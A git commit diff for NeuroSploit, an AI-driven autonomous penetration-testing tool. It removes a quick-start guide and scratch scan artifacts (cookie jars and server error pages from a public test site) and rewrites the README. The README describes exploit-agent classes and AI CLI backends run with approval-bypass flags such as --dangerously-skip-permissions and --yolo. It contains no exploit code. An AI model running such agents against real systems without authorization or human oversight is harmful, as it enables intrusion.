v3.4.1: slim Rust-only branch

Keep only the Rust harness (neurosploit-rs/) + the agent library (agents_md/) it
loads at runtime, plus docs. Remove the Python engine, web GUIs, legacy stack,
docker, build scripts and scratch test files from THIS branch only (other
branches keep everything). Rust-focused README with Kali/Docker + tool-install
guidance and testphp/DVWA usage examples.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
CyberSecurityUP
2026-06-24 19:36:16 -03:00
parent 96f00c1c68
commit 0a2cf58d9e
437 changed files with 117 additions and 154450 deletions
-289
@@ -1,289 +0,0 @@
# NeuroSploit v3 - Quick Start Guide
Get NeuroSploit running in under 5 minutes.
---
## Prerequisites
| Requirement | Minimum | Recommended |
|-------------|---------|-------------|
| **Python** | 3.10+ | 3.12 |
| **Node.js** | 18+ | 20 LTS |
| **Docker** | 24+ | Latest (for Kali sandbox) |
| **RAM** | 4 GB | 8 GB+ |
| **Disk** | 2 GB | 5 GB (with Kali image) |
| **LLM API Key** | 1 provider | Claude recommended |
---
## Step 1: Clone & Configure
```bash
git clone https://github.com/your-org/NeuroSploitv2.git
cd NeuroSploitv2
# Create your environment file
cp .env.example .env
```
Edit `.env` and add at least one API key:
```bash
# Pick one (or more):
ANTHROPIC_API_KEY=sk-ant-... # Claude (recommended)
OPENAI_API_KEY=sk-... # GPT-4
GEMINI_API_KEY=AI... # Gemini Pro
OPENROUTER_API_KEY=sk-or-... # OpenRouter (any model)
```
> **No API key?** Use a local LLM (Ollama or LM Studio) -- see [Local LLM Setup](#local-llm-setup) below.
---
## Step 2: Install Dependencies
### Backend
```bash
pip install -r backend/requirements.txt
```
### Frontend
```bash
cd frontend
npm install
cd ..
```
---
## Step 3: Build Kali Sandbox Image (Optional but Recommended)
The Kali sandbox enables isolated tool execution (Nuclei, Nmap, SQLMap, etc.) in Docker containers.
```bash
# Requires Docker Desktop running
./scripts/build-kali.sh --test
```
This builds a Kali Linux image with 28 pre-installed security tools. Takes ~5 min on first build.
> **No Docker?** NeuroSploit works without it -- the agent uses HTTP-only testing. Docker adds tool-based scanning (Nuclei, Nmap, etc.).
---
## Step 4: Start NeuroSploit
### Option A: Development Mode (hot reload)
Terminal 1 -- Backend:
```bash
uvicorn backend.main:app --host 0.0.0.0 --port 8000 --reload
```
Terminal 2 -- Frontend:
```bash
cd frontend
npm run dev
```
Open: **http://localhost:5173**
### Option B: Production Mode
```bash
# Build frontend
cd frontend && npm run build && cd ..
# Start backend (serves frontend too)
uvicorn backend.main:app --host 0.0.0.0 --port 8000
```
Open: **http://localhost:8000**
### Option C: Quick Start Script
```bash
./start.sh
```
---
## Step 5: Verify Setup
### Check API Health
```bash
curl http://localhost:8000/api/health
```
Expected response:
```json
{
"status": "healthy",
"app": "NeuroSploit",
"version": "3.0.0",
"llm": {
"status": "configured",
"provider": "claude",
"message": "AI agent ready"
}
}
```
### Check Swagger Docs
Open **http://localhost:8000/api/docs** for interactive API documentation.
---
## Your First Scan
### Option 1: Auto Pentest (Recommended)
1. Open the web interface
2. Click **Auto Pentest** in the sidebar
3. Enter a target URL (e.g., `http://testphp.vulnweb.com`)
4. Click **Start Auto Pentest**
5. Watch the 3-stream parallel scan in real-time
### Option 2: Via API
```bash
curl -X POST http://localhost:8000/api/v1/agent/run \
-H "Content-Type: application/json" \
-d '{
"target": "http://testphp.vulnweb.com",
"mode": "auto_pentest"
}'
```
### Option 3: Vuln Lab (Single Type)
1. Click **Vuln Lab** in the sidebar
2. Pick a vulnerability type (e.g., `xss_reflected`)
3. Enter target URL
4. Click **Run Test**
---
## Pages Overview
| Page | What it does |
|------|-------------|
| **Dashboard** (`/`) | Stats, severity charts, recent activity |
| **Auto Pentest** (`/auto`) | One-click full autonomous pentest |
| **Vuln Lab** (`/vuln-lab`) | Test specific vuln types (100 available) |
| **Terminal Agent** (`/terminal`) | AI chat + command execution |
| **Sandboxes** (`/sandboxes`) | Monitor Kali containers in real-time |
| **Scheduler** (`/scheduler`) | Schedule recurring scans |
| **Reports** (`/reports`) | View/download generated reports |
| **Settings** (`/settings`) | Configure LLM providers, features |
---
## Local LLM Setup
### Ollama (Easiest)
```bash
# Install Ollama
curl -fsSL https://ollama.ai/install.sh | sh
# Pull a model
ollama pull llama3.1
# Add to .env
echo "OLLAMA_BASE_URL=http://localhost:11434" >> .env
```
### LM Studio
1. Download from [lmstudio.ai](https://lmstudio.ai)
2. Load any model (e.g., Mistral, Llama)
3. Start the server on port 1234
4. Add to `.env`:
```
LMSTUDIO_BASE_URL=http://localhost:1234
```
---
## Kali Sandbox Commands
```bash
# Build image
./scripts/build-kali.sh
# Rebuild from scratch
./scripts/build-kali.sh --fresh
# Build + verify tools work
./scripts/build-kali.sh --test
# Check running containers (via API)
curl http://localhost:8000/api/v1/sandbox/
# Monitor via web UI
# Open http://localhost:8000/sandboxes
```
### Pre-installed tools (28)
nuclei, naabu, httpx, subfinder, katana, dnsx, uncover, ffuf, gobuster, dalfox, waybackurls, nmap, nikto, sqlmap, masscan, whatweb, curl, wget, git, python3, pip3, go, jq, dig, whois, openssl, netcat, bash
### On-demand tools (28 more)
Installed inside the container automatically when first needed:
wpscan, dirb, hydra, john, hashcat, testssl, sslscan, enum4linux, dnsrecon, amass, medusa, crackmapexec, gau, gitleaks, anew, httprobe, dirsearch, wfuzz, arjun, wafw00f, sslyze, commix, trufflehog, retire, fierce, nbtscan, responder
---
## Troubleshooting
### "AI agent not configured"
Check your `.env` has at least one valid API key:
```bash
curl http://localhost:8000/api/health | python3 -m json.tool
```
### "Kali sandbox image not found"
Build the Docker image:
```bash
./scripts/build-kali.sh
```
### "Docker daemon not running"
Start Docker Desktop, then retry.
### "Port 8000 already in use"
```bash
lsof -i :8000
kill <PID>
```
### Frontend not loading
Dev mode: ensure frontend is running (`npm run dev` in `/frontend`).
Production: ensure `frontend/dist/` exists (`cd frontend && npm run build`).
---
## What's Next
- Read the full [README.md](README.md) for architecture details
- Explore the **100 vulnerability types** in Vuln Lab
- Set up **scheduled scans** for continuous monitoring
- Try the **Terminal Agent** for interactive AI-guided testing
- Check the **Sandbox Dashboard** to monitor container health
---
**NeuroSploit v3** - *AI-Powered Autonomous Penetration Testing Platform*
+117 -228
@@ -1,253 +1,142 @@
# NeuroSploit v3.4.0
# NeuroSploit v3.4.1 🦀
![NeuroSploit](https://img.shields.io/badge/NeuroSploit-Autonomous%20AI%20Pentest-blueviolet)
![Version](https://img.shields.io/badge/Version-3.4.0-blue)
![Version](https://img.shields.io/badge/Version-3.4.1-blue)
![Harness](https://img.shields.io/badge/Harness-Rust%20%7C%20tokio-e6b673)
![License](https://img.shields.io/badge/License-MIT-green)
![Harness](https://img.shields.io/badge/Harness-Rust%20%7C%20tokio%20%7C%20axum-e6b673)
![Agents](https://img.shields.io/badge/MD%20Agents-249-red)
![Models](https://img.shields.io/badge/Models-12%20providers%20%2F%2040%2B-success)
![Backends](https://img.shields.io/badge/Subscription-Claude%20%7C%20Codex%20%7C%20Grok%20%7C%20Gemini-informational)
![MCP](https://img.shields.io/badge/MCP-Playwright-orange)
![Models](https://img.shields.io/badge/Models-12%20providers-success)
**Autonomous, markdown-driven AI penetration testing — now with a Rust multi-model harness.**
**Autonomous, multi-model penetration-testing harness — Rust, CLI-only.**
NeuroSploit turns a URL (or a code repository) into an autonomous security
engagement. A high-performance **Rust harness** (`tokio` + `axum`) drives a
**pool of LLM models** with concurrency, **provider failover**, and **N-model
validator voting** — multiple models must independently agree a finding is real
before it is reported. After recon, the harness **intelligently selects** which
of the **249 markdown agents** match the target instead of running them blindly,
learns across runs via a **reinforcement-learning** reward loop, and serves its
own polished web dashboard.
This branch is the **slim, Rust-only** distribution: the `neurosploit-rs/` workspace
plus the `agents_md/` agent library. It turns a URL (black-box) or a code
repository (white-box) into an autonomous engagement that drives a pool of LLMs
(via **API key** or local **subscription**: Claude Code / Codex / Gemini / Grok),
recons the target, **intelligently selects only the agents matching the
discovered surface**, runs them in parallel, then validates every finding by
**cross-model voting** before reporting.
> The Python engine (v3.3.0) and the original monolith live in
> [`legacy/`](legacy/README.md); the v3.3.0 stdlib dashboard remains in `webgui/`.
## 🦀 The Rust harness (`neurosploit-rs/`)
```bash
cd neurosploit-rs && cargo build --release
# Web dashboard (black-box + white-box modes)
./target/release/neurosploit serve # → http://127.0.0.1:8788
# Black-box: recon → intelligent agent selection → parallel exploit → vote → report
./target/release/neurosploit run https://target.example \
--model anthropic:claude-opus-4-8 --model openai:gpt-5.1 --vote-n 3
# White-box: analyse a repository's source for vulnerabilities
./target/release/neurosploit whitebox /path/to/repo --subscription --model anthropic:claude-opus-4-8
# Subscription (no API key) + real browser proof via Playwright MCP
./target/release/neurosploit run https://t.example --subscription --mcp --model anthropic:claude-opus-4-8
# Pipeline self-test, no keys/login required
./target/release/neurosploit run https://t.example --offline
```
**What it does**
- **Two modes** — *black-box* (URL recon → exploit) and *white-box* (walk a repo,
run code-review/SAST agents on the source).
- **Intelligent selection** — the model picks the agents whose preconditions match
the recon, then runs that subset (not top-N).
- **Multi-model pool** — bounded concurrency, **provider failover**, and the same
panel forms the **N-model validator jury** that cuts false positives.
- **Two auth paths** — **model APIs** (provider key) *or* **subscription**: drive
your local **Claude Code / Codex / Grok / Gemini** logins directly, no API key.
- **12 providers / 40+ models** (Claude, GPT, Grok, **Gemini**, NVIDIA NIM,
DeepSeek, Mistral, Qwen, Groq, Together, OpenRouter, Ollama).
- **RL rewards** persisted to `data/rl_state_rs.json` — validated findings reward
an agent, biasing the next run.
- **Artifacts for reuse** — every run writes `runs/<target>-<ts>/`:
`recon.json/md`, `exploitation.md`, `findings.json/md`, `report.html`.
- **Playwright MCP** on the subscription path for real browser-based proof.
### Agent library — 249 agents
| Category | Dir | Count | Purpose |
|----------|-----|-------|---------|
| Vulnerability specialists | `agents_md/vulns/` | 196 | Exploit a specific vuln class |
| Recon | `agents_md/recon/` | 12 | Information gathering / attack surface |
| Code (white-box SAST) | `agents_md/code/` | 24 | Source-code vulnerability review |
| Meta | `agents_md/meta/` | 17 | Orchestrator, validator, scorers, reporter, RL |
> The full project (Python engine, web GUIs, history) lives on the `main` branch.
---
## Why this architecture
## Build
| Old (≤ v3.2.4) | New (v3.3.0) |
|----------------|-------------|
| 2,500-line Python orchestrator + hand-coded agent classes | Markdown agents + thin engine |
| One embedded LLM loop | Pluggable agentic CLI backends (Claude/Codex/Grok) |
| Provider SDK juggling | Backend owns the agent loop; engine just composes & collects |
| Static agent list | RL-weighted, recon-aware agent selection |
| Reflection-based "evidence" | Playwright MCP proof-of-execution + adversarial validation |
```bash
cd neurosploit-rs
cargo build --release # → target/release/neurosploit
```
Requires a Rust toolchain (`rustup`). **Recommended: run on Kali Linux** (or the
Kali Docker image) so the offensive tools the agents use are already present:
```bash
docker run -it --rm kalilinux/kali-rolling
# then, inside the container:
apt update && apt install -y curl nmap ffuf nodejs npm
# rustscan (faster port scan): cargo install rustscan (or grab a release from GitHub)
```
The agents degrade gracefully: if `rustscan` isn't installed they use `nmap`; if
neither, they probe with `curl`. If a Playwright MCP browser is available they use
it for JS-heavy pages, otherwise they fall back to `curl`.
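
The fallback order described above (`rustscan`, then `nmap`, then `curl`) can be sketched as follows. This is only an illustration under stated assumptions, not the harness's actual code: `on_path` and `pick_scanner` are hypothetical names, and the availability check is a plain `PATH` lookup.

```rust
use std::env;

/// Hypothetical helper: true if `name` exists as a file in any PATH directory.
fn on_path(name: &str) -> bool {
    env::var_os("PATH")
        .map(|paths| env::split_paths(&paths).any(|dir| dir.join(name).is_file()))
        .unwrap_or(false)
}

/// Preference order taken from the README text; `curl` is the last resort.
const PREFERENCE: [&str; 2] = ["rustscan", "nmap"];

/// Hypothetical selector: returns the first preferred tool that
/// `is_available` accepts, or "curl" when neither scanner is present.
fn pick_scanner(is_available: impl Fn(&str) -> bool) -> &'static str {
    PREFERENCE
        .iter()
        .copied()
        .find(|&tool| is_available(tool))
        .unwrap_or("curl")
}
```

Calling `pick_scanner(on_path)` checks the real `PATH`; passing a closure instead keeps the fallback order easy to test without installing anything.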
---
## Usage
Run with **no arguments** for an interactive wizard:
```bash
./target/release/neurosploit
```
Or drive it directly:
```bash
# Black-box — subscription (no API key), Opus, browser via Playwright if present, verbose
./target/release/neurosploit run http://testphp.vulnweb.com/ \
--subscription --model anthropic:claude-opus-4-8 --mcp -v
# Black-box — API keys, multi-model voting panel (1st finds, others adjudicate)
./target/release/neurosploit run http://testphp.vulnweb.com/ \
--model anthropic:claude-opus-4-8 --model openai:gpt-5.1 --vote-n 3
# White-box — clone a vulnerable app and review its source
git clone https://github.com/digininja/DVWA /tmp/DVWA
./target/release/neurosploit whitebox /tmp/DVWA \
--subscription --model anthropic:claude-opus-4-8 -v
# Offline pipeline self-test (no keys/login needed)
./target/release/neurosploit run http://testphp.vulnweb.com/ --offline
# Utilities
./target/release/neurosploit agents # library counts
./target/release/neurosploit models # providers & models
./target/release/neurosploit --help # full help with examples
```
### Options (`run` / `whitebox`)
| Flag | Meaning |
|------|---------|
| `--model provider:model` | Repeatable. First = primary; the rest fail over **and** form the voting jury. |
| `--subscription` | Use the local CLI login (Claude/Codex/Gemini/Grok) instead of an API key. |
| `--mcp` | Enable Playwright MCP (auto-provisioned via `npx`; backends without MCP use built-in tools). |
| `--vote-n N` | How many models must agree a finding is real (default: 3 for `run`, 2 for `whitebox`). |
| `--max-agents N` | Cap agents run (`0` = all matching the recon). |
| `--offline` | Exercise the full pipeline without calling any model. |
| `-v, --verbose` | Log each agent as it launches, recon, and votes. |
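
As a rough illustration of the `--model provider:model` convention in the table above, the sketch below splits each value at the first `:` and treats the first entry as the primary. The type and function names (`ModelSpec`, `parse_model_spec`, `split_pool`) are assumptions made for this example and are not taken from the harness source.

```rust
/// Hypothetical representation of one `--model provider:model` value.
#[derive(Debug, Clone, PartialEq)]
struct ModelSpec {
    provider: String,
    model: String,
}

/// Split at the FIRST ':' so model names that themselves contain ':'
/// stay intact in the `model` part.
fn parse_model_spec(raw: &str) -> Result<ModelSpec, String> {
    match raw.split_once(':') {
        Some((provider, model)) if !provider.is_empty() && !model.is_empty() => Ok(ModelSpec {
            provider: provider.to_string(),
            model: model.to_string(),
        }),
        _ => Err(format!("expected provider:model, got '{}'", raw)),
    }
}

/// First spec is the primary; the remaining specs are the ones that
/// fail over and form the voting jury.
fn split_pool(specs: &[ModelSpec]) -> Option<(&ModelSpec, &[ModelSpec])> {
    specs.split_first()
}
```

Splitting at the first colon rather than the last is a design choice for this sketch: it keeps a value such as `ollama:llama3:8b` usable, with `llama3:8b` as the model name.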
### Auth
- **API key** — export the provider's key (`ANTHROPIC_API_KEY`, `OPENAI_API_KEY`,
`GEMINI_API_KEY`, `XAI_API_KEY`, `NVIDIA_NIM_API_KEY`, …). See `.env.example`.
- **Subscription** — `--subscription` drives your local `claude` / `codex` /
`gemini` / `grok` login. No API key needed.
---
## How it works
```
┌──────────────────────────────────────────────────────────────┐
URL ──▶ │ neurosploit (terminal) │
│ │ │
│ ▼ │
│ orchestrator ── loads agents_md/ (213) ── applies RL weights │
│ │ │
│ ▼ composes ONE master prompt │
│ backend (Claude Code | Codex | Grok) ◀── Playwright MCP │
│ │ autonomously runs the pipeline below │
│ ▼ │
│ recon → select agents → exploit → VALIDATE → filter FPs │
│ → severity → impact → report → RL feedback │
└──────────────────────────────────────────────────────────────┘
│ │
▼ ▼
results/findings.json data/rl_state.json (learns)
target ─▶ recon (curl/nmap/…) ─▶ INTELLIGENT agent selection (recon-aware)
─▶ parallel exploitation ─▶ cross-model validation vote
─▶ severity/score ─▶ report (HTML + Typst PDF) ─▶ RL reward update
```
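
The cross-model validation vote in the pipeline can be pictured with a minimal threshold check. This is a sketch under assumptions: `Verdict` and `passes_vote` are hypothetical names, and the real harness may weigh or collect verdicts differently.

```rust
/// Hypothetical verdict returned by one model for a candidate finding.
#[derive(Debug, Clone, Copy, PartialEq)]
enum Verdict {
    Confirmed,
    Rejected,
}

/// A finding is kept only when at least `vote_n` models confirm it,
/// mirroring the meaning of `--vote-n`.
fn passes_vote(verdicts: &[Verdict], vote_n: usize) -> bool {
    let confirmed = verdicts
        .iter()
        .filter(|v| **v == Verdict::Confirmed)
        .count();
    confirmed >= vote_n
}
```

Note that with this rule a jury smaller than `vote_n` can never confirm a finding; how the harness handles that case is not stated here.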
The engine never fabricates findings: every candidate is independently
re-exploited (`meta/exploit_validator`), run through an adversarial skeptic
(`meta/false_positive_filter`), and only then scored and reported.
Every run writes a self-contained folder `runs/ns-<ts>-<target>/`:
| File | Contents |
|------|----------|
| `status.json` | `running` → `complete` with a summary |
| `recon.json` / `recon.md` | mapped attack surface |
| `exploitation.md` | raw per-agent transcript |
| `findings.json` / `findings.md` | validated findings (reuse by other tools/AIs) |
| `report.html`, `report.typ`, `report.pdf` | final report (PDF via the Typst engine) |
A reinforcement-learning reward store (`data/rl_state_rs.json`) biases agent
selection on future runs.
## Agent library — `agents_md/` (249)
| Category | Count | Purpose |
|----------|-------|---------|
| `vulns/` | 196 | Exploit a specific vulnerability class |
| `recon/` | 12 | Information gathering / attack surface |
| `code/` | 24 | White-box source-code (SAST) review |
| `meta/` | 17 | Orchestrator, validator, scorers, reporter, RL |
Each agent is a self-contained markdown playbook (`## User Prompt` methodology +
`## System Prompt` strict anti-false-positive rules). Drop a new `.md` into the
matching folder and the harness picks it up.
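
To make the playbook layout concrete, here is a small sketch that splits an agent file into its `## ` sections. It assumes only what the text above states (a `## User Prompt` and a `## System Prompt` heading); `split_sections` is a hypothetical helper, not the harness's loader, and it does not special-case `## ` lines inside fenced code.

```rust
use std::collections::HashMap;

/// Hypothetical helper: map each `## Heading` to the trimmed text below it.
/// Lines before the first `## ` heading (for example a `# Title`) are ignored.
fn split_sections(markdown: &str) -> HashMap<String, String> {
    let mut sections = HashMap::new();
    let mut current: Option<String> = None;
    let mut body = String::new();

    for line in markdown.lines() {
        if let Some(title) = line.strip_prefix("## ") {
            // A new heading closes the previous section, if any.
            if let Some(name) = current.take() {
                sections.insert(name, body.trim().to_string());
            }
            current = Some(title.trim().to_string());
            body.clear();
        } else if current.is_some() {
            body.push_str(line);
            body.push('\n');
        }
    }
    // Flush the final section.
    if let Some(name) = current {
        sections.insert(name, body.trim().to_string());
    }
    sections
}
```

A loader built this way could reject any `.md` file that lacks either of the two expected sections before the agent is offered for selection.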
---
## The agent library (`agents_md/`)
## Safety
**213 agents** — see [`agents_md/REGISTRY.md`](agents_md/REGISTRY.md).
- **196 vulnerability specialists** (`agents_md/vulns/`) — each a self-contained
playbook with a real methodology, payloads, CWE mapping, and a strict
anti-false-positive `## System Prompt`. Coverage includes the classic OWASP
web set **plus modern classes**:
- **LLM/AI security** (OWASP LLM Top 10): prompt injection (direct/indirect),
jailbreak, system-prompt leak, insecure output handling, RAG poisoning,
tool-invocation/function-calling abuse, excessive agency, PII leakage…
- **Cloud/K8s/containers**: IMDS SSRF (AWS/GCP/Azure), kubelet/dashboard
exposure, container & docker-socket escape, bucket takeover, IAM privesc…
- **Modern API/auth**: JWT alg/kid/jwk confusion, OAuth PKCE downgrade, SAML
XSW, OIDC, CSWSH, refresh-token & MFA bypass, account-takeover chains…
- **Advanced injection**: SSTI (Jinja2/FreeMarker/Velocity/Thymeleaf), SSPP,
XXE OOB, YAML/pickle deserialization, JNDI, XSLT…
- **Protocol/cache/smuggling**: HTTP/2 & CL.TE/TE.CL desync, h2c, web cache
deception/poisoning, response splitting, path-confusion…
- **Logic/crypto/supply-chain**: dependency confusion, padding oracle, weak
JWT secret, price/coupon/workflow abuse, exposed `.git`/`.env`/CI secrets…
- **17 meta-agents** (`agents_md/meta/`): `orchestrator`, `recon`,
`exploit_validator`, `false_positive_filter`, `severity_assessor`,
`impact_evaluator`, `reporter`, `rl_feedback`, plus migrated expert roles.
Add your own by dropping a `.md` into `agents_md/vulns/` (or extend the
data-driven builder, `scripts/build_agents.py`). It is picked up automatically.
---
## Quickstart
```bash
# 1. Have at least one agentic CLI installed: Claude Code, Codex, or Grok CLI
# (Playwright MCP needs Node/npx)
./neurosploit backends # show what's detected
./neurosploit agents # {'vulns': 196, 'meta': 17, 'total': 213}
# 2. Interactive: enter a URL, pick a backend + model, go
./neurosploit
# 3. Or one-shot:
./neurosploit run https://target.example \
--backend claude --model claude-opus-4-8 \
--collaborator oob.your-collab.net
# 4. Preview the composed master prompt without executing the backend:
./neurosploit run https://target.example --dry-run
```
Outputs land in `results/<target>/findings.json` and `reports/`, and the RL
state updates in `data/rl_state.json`.
### Web dashboard
A zero-dependency (Python stdlib only) dashboard — no npm, no build step:
```bash
python3 webgui/server.py # → http://127.0.0.1:8787
```
Tabs:
- **Run** — multi-target input, backend + provider + model pickers (40 models
across CLI and API providers), verbosity, RL/MCP toggles, a live execution
console (shows the exact backend command and per-task activity), and findings
with screenshots.
- **Agents** — browse all 213 agents and **add new `.md` agents** from the UI;
the main orchestrator picks them up on the next run.
- **Insights** — interactive chart of RL agent weights + findings by severity.
- **Reports** — download/preview the **PDF + HTML** reports (Typst engine).
- **Settings · API** — execution mode (CLI vs API), per-provider API keys,
orchestrator selection, default verbosity.
It calls `neurosploit_agent` directly. The previous React app and FastAPI backend
were retired to `legacy/` (`frontend_react/`, `backend_fastapi/`).
### Backends
| Backend | Binary | Autonomy flag | Subscription |
|---------|--------|---------------|--------------|
| Claude Code | `claude` | `--dangerously-skip-permissions` | ✅ via Claude login |
| Codex CLI | `codex` | `--dangerously-bypass-approvals-and-sandbox` | — |
| Grok CLI | `grok` | `--yolo` | — |
The engine auto-detects installed backends and only offers those. In the
interactive flow, answering **yes** to "Use Claude subscription" runs Claude Code
against your logged-in subscription instead of an API key.
### Models
Latest models per provider live in `neurosploit_agent/models.py`, including the
**NVIDIA NIM** provider (PR #28, OpenAI-compatible at
`https://integrate.api.nvidia.com/v1`, `nvapi-` keys), Anthropic Claude 4.x,
OpenAI, xAI Grok, Gemini, OpenRouter, and local Ollama.
---
## Reinforcement learning
Every run produces per-agent reward signals (`meta/rl_feedback` +
`neurosploit_agent/rl.py`): validated findings reward an agent (weighted by
severity), rejected false positives penalize it, correct skips stay neutral.
Weights are bounded `[0.05, 1.0]` and carry per-tech-stack affinity, so the
engine learns, e.g., to prioritize `ssti_jinja2` on Flask targets. State is
explainable and persisted to `data/rl_state.json`.
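
The reward rule described above can be sketched as a bounded update. Only the `[0.05, 1.0]` bounds and the three outcome kinds come from the text; the step size, the 0.0 to 1.0 severity scale, and the names `Outcome` and `update_weight` are assumptions for illustration, and per-tech-stack affinity is left out.

```rust
/// Bounds stated in the README.
const MIN_WEIGHT: f64 = 0.05;
const MAX_WEIGHT: f64 = 1.0;

/// Hypothetical per-agent outcome of one run.
#[derive(Debug, Clone, Copy)]
enum Outcome {
    /// Validated finding; `severity` is assumed to lie in 0.0..=1.0.
    Validated { severity: f64 },
    /// Finding rejected as a false positive.
    FalsePositive,
    /// Agent correctly skipped the target.
    CorrectSkip,
}

/// Apply one reward signal and keep the weight inside the stated bounds.
/// `step` is an assumed learning-rate-like constant.
fn update_weight(weight: f64, outcome: Outcome, step: f64) -> f64 {
    let delta = match outcome {
        Outcome::Validated { severity } => step * severity,
        Outcome::FalsePositive => -step,
        Outcome::CorrectSkip => 0.0,
    };
    (weight + delta).clamp(MIN_WEIGHT, MAX_WEIGHT)
}
```

Clamping after every update means a long streak of rejected findings can lower an agent's priority but never remove it from selection entirely.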
---
## Safety & authorization
NeuroSploit is for **authorized** security testing only. Every agent's system
prompt enforces scope and proof-of-exploitation; DoS-class agents refuse to
flood and require explicit rules-of-engagement. You are responsible for having
written permission for any target you point it at.
---
## Repository layout
```
neurosploit # launcher (./neurosploit)
neurosploit_agent/ # the v3.3.0 engine
cli.py orchestrator.py agent_loader.py backends.py rl.py mcp.py models.py config.py
agents_md/
vulns/ (196) # vulnerability specialist agents
meta/ (17) # orchestrator, recon, validator, scorers, reporter, RL, roles
REGISTRY.md # generated index
scripts/build_agents.py # data-driven agent builder
legacy/ # retired pre-v3.3.0 Python orchestration
```
See [`RELEASE.md`](RELEASE.md) for the full v3.3.0 changelog.
---
For **authorized** testing only. Agents are instructed to stay in scope, never run
destructive/DoS actions, and require proof-of-exploitation. You are responsible for
having permission for any target.
## License
-7
@@ -1,7 +0,0 @@
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Tue, 23 Jun 2026 21:13:25 GMT
Content-Length: 1245
-29
@@ -1,29 +0,0 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>404 - File or directory not found.</h2>
<h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
</fieldset></div>
</div>
</body>
</html>
-5
@@ -1,5 +0,0 @@
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
#HttpOnly_testaspnet.vulnweb.com FALSE / FALSE 0 ASP.NET_SessionId 1mkryz45pc3j44ua53yfe545
-5
@@ -1,5 +0,0 @@
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
#HttpOnly_testaspnet.vulnweb.com FALSE / FALSE 0 ASP.NET_SessionId okc513jjz1kxsxbmkmidnmfs
-5
@@ -1,5 +0,0 @@
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
#HttpOnly_testaspnet.vulnweb.com FALSE / FALSE 0 ASP.NET_SessionId r2w133jnjihmgf552tyes4uh
-122
@@ -1,122 +0,0 @@
<html>
<head>
<title>Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that &lt;machineKey&gt; configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.<br><br>http://go.microsoft.com/fwlink/?LinkID=314055</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that &lt;machineKey&gt; configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.<br><br>http://go.microsoft.com/fwlink/?LinkID=314055</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that &lt;machineKey&gt; configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.<br><br>http://go.microsoft.com/fwlink/?LinkID=314055<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>
[No relevant source lines]</pre></code>
</td>
</tr>
</table>
<br>
<b> Source File: </b> c:\Windows\Microsoft.NET\Framework64\v2.0.50727\Temporary ASP.NET Files\root\e6eb278b\4a52d72d\App_Web_pebpzm2g.0.cs<b> &nbsp;&nbsp; Line: </b> 0
<br><br>
<b>Stack Trace:</b> <br><br>
<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>
[ViewStateException: Invalid viewstate.
Client IP: 177.62.32.16
Port: 56298
User-Agent: Mozilla/5.0
